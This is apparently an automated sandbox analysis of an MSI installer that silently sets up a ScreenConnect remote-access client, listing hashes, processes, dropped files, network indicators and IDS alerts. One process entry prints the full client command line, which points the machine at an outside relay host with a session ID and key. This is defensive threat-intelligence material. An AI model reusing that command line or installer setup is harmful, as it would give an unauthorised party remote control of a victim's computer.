File name: ea330d901669c5b2bbd27c6252c3ed6a6c3694f5ee4b2c55371de2ed872e1a56.msi

Full analysis: https://app.any.run/tasks/972048c1-14ae-46fe-82dc-0f13316bfa85
Verdict: Malicious activity
Analysis date: November 10, 2024, 17:53:06
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
generated-doc
remote
screenconnect
Indicators:
MIME: application/x-msi
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {1A6C5EE4-2F77-40E7-9DD9-8EBE0CA46107}, Create Time/Date: Wed Feb 21 19:39:02 2024, Last Saved Time/Date: Wed Feb 21 19:39:02 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
MD5: 1E7FBAEBF26C173BD25E09C110CC46FC
SHA1: 5873EF0771DA9E0DFF1F1FA93D01B77EFB8A9EB8
SHA256: EA330D901669C5B2BBD27C6252C3ED6A6C3694F5EE4B2C55371DE2ED872E1A56
SSDEEP: 98304:NiG+CeXyEMWISBYFxi5Xmad5SqKGaCH+e7eSnOmcQVbcAhS9/9U7w/2D3861JBIK:bf04wU/

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    No malicious indicators.
  • SUSPICIOUS
    • Executes as Windows Service
      • VSSVC.exe (PID: 5068)
      • ScreenConnect.ClientService.exe (PID: 4128)
    • Executable content was dropped or overwritten
      • rundll32.exe (PID: 5004)
  • INFO
    • Checks supported languages
      • msiexec.exe (PID: 5284)
      • msiexec.exe (PID: 3844)
    • An automatically generated document
      • msiexec.exe (PID: 5748)
    • Create files in a temporary directory
      • rundll32.exe (PID: 5004)
    • Reads the computer name
      • msiexec.exe (PID: 3844)
      • msiexec.exe (PID: 5284)
    • Executable content was dropped or overwritten
      • msiexec.exe (PID: 5748)
      • msiexec.exe (PID: 5284)
    • Manages system restore points
      • SrTasks.exe (PID: 944)
No Malware configuration.

TRiD

.msi | Microsoft Windows Installer (98.5)
.msi | Microsoft Installer (100)

EXIF

FlashPix

CodePage: Windows Latin 1 (Western European)
Title: Installation Database
Subject: Default
Author: ScreenConnect Software
Keywords: Default
Comments: Default
Template: Intel;1033
RevisionNumber: {1A6C5EE4-2F77-40E7-9DD9-8EBE0CA46107}
CreateDate: 2024:02:21 19:39:02
ModifyDate: 2024:02:21 19:39:02
Pages: 200
Words: 2
Software: Windows Installer XML Toolset (3.11.0.1701)
Security: Read-only recommended
Total processes: 139
Monitored processes: 12
Malicious processes: 0
Suspicious processes: 0

Behavior graph

Processes shown in the graph, in the order listed ("no specs" is the graph's annotation for a process with no recorded indicators):
start
msiexec.exe
msiexec.exe
msiexec.exe (no specs)
rundll32.exe
vssvc.exe (no specs)
srtasks.exe (no specs)
conhost.exe (no specs)
msiexec.exe (no specs)
msiexec.exe (no specs)
screenconnect.clientservice.exe (no specs)
screenconnect.windowsclient.exe (no specs)
screenconnect.windowsclient.exe (no specs)

Process information

PID 944 (SrTasks.exe)
  CMD: C:\WINDOWS\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:11
  Path: C:\Windows\System32\SrTasks.exe
  Parent process: msiexec.exe
  User: SYSTEM
  Company: Microsoft Corporation
  Integrity Level: SYSTEM
  Description: Microsoft® Windows System Protection background tasks.
  Exit code: 0
  Version: 10.0.19041.1 (WinBuild.160101.0800)

PID 1452 (ScreenConnect.WindowsClient.exe)
  CMD: "C:\Program Files (x86)\ScreenConnect Client (b61627138138a03e)\ScreenConnect.WindowsClient.exe" "RunRole" "525b3672-7f63-42f2-84e3-7b06615e8b41" "System"
  Path: C:\Program Files (x86)\ScreenConnect Client (b61627138138a03e)\ScreenConnect.WindowsClient.exe
  Parent process: ScreenConnect.ClientService.exe
  User: SYSTEM
  Company: ScreenConnect Software
  Integrity Level: SYSTEM
  Description: ScreenConnect Client
  Exit code: 0
  Version: 23.9.10.8817

PID 2724 (msiexec.exe)
  CMD: C:\Windows\syswow64\MsiExec.exe -Embedding 7D9BAF9B86EEE329D05DFBDC21DD8836
  Path: C:\Windows\SysWOW64\msiexec.exe
  Parent process: msiexec.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Windows® installer
  Exit code: 0
  Version: 5.0.19041.3636 (WinBuild.160101.0800)

PID 3004 (conhost.exe)
  CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
  Path: C:\Windows\System32\conhost.exe
  Parent process: SrTasks.exe
  User: SYSTEM
  Company: Microsoft Corporation
  Integrity Level: SYSTEM
  Description: Console Window Host
  Exit code: 0
  Version: 10.0.19041.1 (WinBuild.160101.0800)

PID 3844 (msiexec.exe)
  CMD: C:\Windows\syswow64\MsiExec.exe -Embedding 16ECEE08FD756953CB59E15B25A7598F C
  Path: C:\Windows\SysWOW64\msiexec.exe
  Parent process: msiexec.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Windows® installer
  Exit code: 0
  Version: 5.0.19041.3636 (WinBuild.160101.0800)
  Modules (images):
    c:\windows\syswow64\msiexec.exe
    c:\windows\system32\ntdll.dll
    c:\windows\syswow64\ntdll.dll
    c:\windows\system32\wow64.dll
    c:\windows\system32\wow64win.dll
    c:\windows\system32\wow64cpu.dll
    c:\windows\syswow64\kernel32.dll
    c:\windows\syswow64\kernelbase.dll
    c:\windows\syswow64\apphelp.dll
    c:\windows\syswow64\aclayers.dll

PID 3912 (msiexec.exe)
  CMD: C:\Windows\syswow64\MsiExec.exe -Embedding AE348D4ED3C3B7F9300135B9CCEF4336 E Global\MSI0000
  Path: C:\Windows\SysWOW64\msiexec.exe
  Parent process: msiexec.exe
  User: SYSTEM
  Company: Microsoft Corporation
  Integrity Level: SYSTEM
  Description: Windows® installer
  Exit code: 0
  Version: 5.0.19041.3636 (WinBuild.160101.0800)

PID 4128 (ScreenConnect.ClientService.exe)
  CMD: "C:\Program Files (x86)\ScreenConnect Client (b61627138138a03e)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=settleweddings.in&p=8041&s=60a0ebd2-7aa6-4fe0-a597-a609dbec19a3&k=BgIAAACkAABSU0ExAAgAAAEAAQARwlCbNekqtvn7ehBbVwdj7uvzavA8rmmmr3yj7MR0sbp1gpODtITSSp2yopf%2ba7WKdfYEX%2fyTe6B0w%2birgqpxQHxW0KLJJ9dnyhCmBc0kgbG0vIPUmrbaML2HQr0t7mn269V%2b%2bWn87tuotq4VeGoagOdEWUVVZaGSEJ94nqZqGkrTz0RPCJC2SBT%2boKzc%2fKQO5wG%2fJpqFDDBxFZQwAzq31LnTDb6A3I3SoWMZBbyw1AOrfJaDaz8unfrictd01UIWxSfjfeZJdHg01pQ1qsSttdhfmQZCMI9%2fl6zudjwuJ52f7zCQREbAV%2bmhryBoYftW5MO08DWgvKvVv%2bp776bN&c=latest&c=&c=&c=&c=&c=&c=&c="
  Path: C:\Program Files (x86)\ScreenConnect Client (b61627138138a03e)\ScreenConnect.ClientService.exe
  Parent process: services.exe
  User: SYSTEM
  Integrity Level: SYSTEM
  Version: 23.9.10.8817

PID 5004 (rundll32.exe)
  CMD: rundll32.exe "C:\Users\admin\AppData\Local\Temp\MSICB48.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_576468 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
  Path: C:\Windows\SysWOW64\rundll32.exe
  Parent process: msiexec.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Windows host process (Rundll32)
  Exit code: 0
  Version: 10.0.19041.3636 (WinBuild.160101.0800)
  Modules (images):
    c:\windows\syswow64\rundll32.exe
    c:\windows\system32\ntdll.dll
    c:\windows\syswow64\ntdll.dll
    c:\windows\system32\wow64.dll
    c:\windows\system32\wow64win.dll
    c:\windows\system32\wow64cpu.dll
    c:\windows\syswow64\kernel32.dll
    c:\windows\syswow64\kernelbase.dll
    c:\windows\syswow64\apphelp.dll
    c:\windows\syswow64\aclayers.dll

PID 5068 (VSSVC.exe)
  CMD: C:\WINDOWS\system32\vssvc.exe
  Path: C:\Windows\System32\VSSVC.exe
  Parent process: services.exe
  User: SYSTEM
  Company: Microsoft Corporation
  Integrity Level: SYSTEM
  Description: Microsoft® Volume Shadow Copy Service
  Version: 10.0.19041.1 (WinBuild.160101.0800)
  Modules (images):
    c:\windows\system32\vssvc.exe
    c:\windows\system32\ntdll.dll
    c:\windows\system32\kernel32.dll
    c:\windows\system32\kernelbase.dll
    c:\windows\system32\msvcrt.dll
    c:\windows\system32\oleaut32.dll
    c:\windows\system32\msvcp_win.dll
    c:\windows\system32\ucrtbase.dll
    c:\windows\system32\combase.dll
    c:\windows\system32\rpcrt4.dll

PID 5284 (msiexec.exe)
  CMD: C:\WINDOWS\system32\msiexec.exe /V
  Path: C:\Windows\System32\msiexec.exe
  Parent process: services.exe
  User: SYSTEM
  Company: Microsoft Corporation
  Integrity Level: SYSTEM
  Description: Windows® installer
  Version: 5.0.19041.1 (WinBuild.160101.0800)
  Modules (images):
    c:\windows\system32\msiexec.exe
    c:\windows\system32\ntdll.dll
    c:\windows\system32\kernel32.dll
    c:\windows\system32\kernelbase.dll
    c:\windows\system32\apphelp.dll
    c:\windows\system32\aclayers.dll
    c:\windows\system32\msvcrt.dll
    c:\windows\system32\user32.dll
    c:\windows\system32\win32u.dll
    c:\windows\system32\gdi32.dll

Total events: 1 320
Read events: 1 287
Write events: 24
Delete events: 9

Modification events

PID 5284 msiexec.exe | write
  Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SystemRestore
  Name: SrCreateRp (Enter)
  Value:
480000000000000007416D6E9933DB01A41400009C150000D50700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
PID 5284 msiexec.exe | write
  Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SPP
  Name: SppGetSnapshots (Enter)
  Value:
480000000000000007416D6E9933DB01A41400009C150000D20700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
PID 5284 msiexec.exe | write
  Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SPP
  Name: SppGetSnapshots (Leave)
  Value:
4800000000000000222BB76E9933DB01A41400009C150000D20700000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000
PID 5284 msiexec.exe | write
  Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SPP
  Name: SppEnumGroups (Enter)
  Value:
4800000000000000222BB76E9933DB01A41400009C150000D10700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
PID 5284 msiexec.exe | write
  Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SPP
  Name: SppEnumGroups (Leave)
  Value:
480000000000000085F3BB6E9933DB01A41400009C150000D10700000100000000000000010000000000000000000000000000000000000000000000000000000000000000000000
PID 5284 msiexec.exe | write
  Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SPP
  Name: SppCreate (Enter)
  Value:
48000000000000003DBCC06E9933DB01A41400009C150000D00700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
PID 5284 msiexec.exe | write
  Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SPP
  Name: LastIndex
  Value: 11
PID 5284 msiexec.exe | write
  Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SPP
  Name: SppGatherWriterMetadata (Enter)
  Value:
4800000000000000B3533A6F9933DB01A41400009C150000D30700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
PID 5284 msiexec.exe | write
  Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\VssapiPublisher
  Name: IDENTIFY (Enter)
  Value:
480000000000000015B93C6F9933DB01A41400000C160000E80300000100000000000000000000005143F142C1DEB9408D5CB3DC52C5B1FF00000000000000000000000000000000
PID 5068 VSSVC.exe | write
  Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer
  Name: IDENTIFY (Enter)
  Value:
4800000000000000B738466F9933DB01CC130000F01B0000E80300000100000001000000000000000000000000000000000000000000000000000000000000000000000000000000
Executable files: 16
Suspicious files: 22
Text files: 9
Unknown types: 0

Dropped files

PID | Process | Filename

5284 | msiexec.exe | C:\System Volume Information\SPP\metadata-2
  Type, MD5, SHA256: not listed in the report
5284 | msiexec.exe | C:\Windows\Installer\90989.msi
  Type, MD5, SHA256: not listed in the report
5004 | rundll32.exe | C:\Users\admin\AppData\Local\Temp\MSICB48.tmp-\CustomAction.config
  Type: xml
  MD5: EB99EE012EB63C162EEBC1DF3A15990B
  SHA256: C5045C2D482F71215877EB668264EE47E1415792457F19A5A55651C3554CC7CD
5748 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\MSICB48.tmp
  Type: executable
  MD5: 8D94C9F4C07B76B4E32DAFFCC51109DA
  SHA256: 2B35C0E4088B2A7728FA7BC6A5BFDEFED7665598DE6D49641FDF5D1F1271A4D7
5004 | rundll32.exe | C:\Users\admin\AppData\Local\Temp\MSICB48.tmp-\Microsoft.Deployment.WindowsInstaller.dll
  Type: executable
  MD5: 5EF88919012E4A3D8A1E2955DC8C8D81
  SHA256: 3E54286E348EBD3D70EAED8174CCA500455C3E098CDD1FCCB167BC43D93DB29D
5004 | rundll32.exe | C:\Users\admin\AppData\Local\Temp\MSICB48.tmp-\ScreenConnect.Core.dll
  Type: executable
  MD5: B319407E807BE1A49E366F7F8EA7EE2A
  SHA256: 761B7E50BAA229E8AFCD9A50990D7F776DDB5ED1EA5FBB131C802E57CF918742
5284 | msiexec.exe | C:\System Volume Information\SPP\snapshot-2
  Type: binary
  MD5: E5D66BF8D82824289B41411AB4AF74A7
  SHA256: 94782C5D71ECE84AB3574B9183CD9DF6F71EE8EC1665888C0F587E3C1463D3B2
5284 | msiexec.exe | C:\Program Files (x86)\ScreenConnect Client (b61627138138a03e)\ScreenConnect.Client.dll
  Type: executable
  MD5: 6BC9611D5B6CEE698149A18D986547A8
  SHA256: 17377A52EEAE11E8EE01EB629D6A60C10015AD2BB8BC9768E5C8E4B6500A15ED
5284 | msiexec.exe | C:\Windows\Installer\inprogressinstallinfo.ipi
  Type: binary
  MD5: 5899D1DFD7C7219CD985B4DDFF9BA8FE
  SHA256: 5A967D67AAD55942093A06E0CF57A9FEF6551BF8346CB5400C89A5CF66288BD9
5284 | msiexec.exe | C:\Windows\Temp\~DF3B72E8AA83EEB519.TMP
  Type: binary
  MD5: 5899D1DFD7C7219CD985B4DDFF9BA8FE
  SHA256: 5A967D67AAD55942093A06E0CF57A9FEF6551BF8346CB5400C89A5CF66288BD9
HTTP(S) requests: 6
TCP/UDP connections: 22
DNS requests: 8
Threats: 3

HTTP requests

PID, process, type and size were not recorded for these requests.

Method | HTTP Code | IP | URL | CN | Reputation
GET | 200 | 23.48.23.176:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | whitelisted
GET | 200 | 23.48.23.176:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | whitelisted
GET | 200 | 23.48.23.176:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | whitelisted
GET | 200 | 23.218.209.163:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | whitelisted
GET | 200 | 23.218.209.163:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | whitelisted
GET | 200 | 23.218.209.163:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | whitelisted

Connections

A "-" marks a column the report left empty.

PID | Process | IP | Domain | ASN | CN | Reputation
6944 | svchost.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
- | - | 192.168.100.255:137 | - | - | - | whitelisted
1588 | RUXIMICS.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
- | - | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
- | - | 192.168.100.255:138 | - | - | - | whitelisted
- | - | 23.48.23.176:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted
1588 | RUXIMICS.exe | 23.48.23.176:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted
6944 | svchost.exe | 23.218.209.163:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted
1588 | RUXIMICS.exe | 23.218.209.163:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted
- | - | 23.218.209.163:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted

DNS requests

Domain | IP | Reputation
settings-win.data.microsoft.com | 4.231.128.59, 51.124.78.146, 20.73.194.208 | whitelisted
google.com | 172.217.23.110 | whitelisted
crl.microsoft.com | 23.48.23.176, 23.48.23.194, 23.48.23.143, 23.48.23.147, 23.48.23.164 | whitelisted
www.microsoft.com | 23.218.209.163 | whitelisted
settleweddings.in | 85.31.47.16 | unknown
self.events.data.microsoft.com | 20.42.65.88 | whitelisted

Threats

PID and process were not recorded for these alerts.

Class | Message
Misc Attack | ET DROP Spamhaus DROP Listed Traffic Inbound group 9
Misc activity | ET INFO ScreenConnect/ConnectWise Initial Checkin Packet M2
Potential Corporate Privacy Violation | REMOTE [ANY.RUN] ScreenConnect Server Response
No debug info